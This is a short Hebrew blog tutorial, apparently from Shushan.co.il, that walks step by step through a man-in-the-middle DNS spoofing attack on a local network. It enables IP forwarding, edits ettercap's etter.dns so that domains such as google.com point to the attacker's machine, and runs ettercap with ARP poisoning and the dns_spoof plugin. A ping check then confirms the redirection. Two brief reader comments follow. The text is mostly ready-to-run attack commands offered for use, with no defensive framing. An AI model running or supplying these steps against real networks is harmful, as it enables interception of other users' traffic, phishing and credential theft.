MITM DNS Spoofing התחזות לשרת DNS
הסבר מלא מהו MITM תוכלו למצוא פה
נתחיל בכך שנגדיר את המחשב שלנו כמעביר IPV4
נפתח את ה Terminal ונרשום
echo 1 > /proc/sys/net/ipv4/ip_forward
כעת נרשום locate etetercap.dns
נרשום
nano /etc/ettercap/ettercap/etter.dns
נוסיף את השורה שבה נכניס את הכתובת של המחשב שלנו (עליו יישב האתר המדומה) ואת הכתובת שאם המשתמש יקיש הוא יגיע לIP שנרשום
כעת נפעיל את ה ARP Spoofing
פתחו Terminal חדש והקישו
ettercap -T -q -M arp:remote -P dns_spoof //
ובסיום כל הכתובות שהכנסתם יוגדרו
ניתן לראות שמעכשיו google.com הוא לא הכתובת המקורית ועכשיו היא 192.168.1.106
ובשביל לאמת זאת נכנס לאחד המחשבים ברשת ונעשה פינג לכתובת google.com
כל הזכויות שמורות לטל בן שושן – Shushan.co.il
לאחר הפינג ניתן לאמת שב DNS Spoofing עובד!
2 comments
כן
אני נהנה כל פעם מחדש לקרוא את הפוסטים שלך. תודה רבה איש יקר!!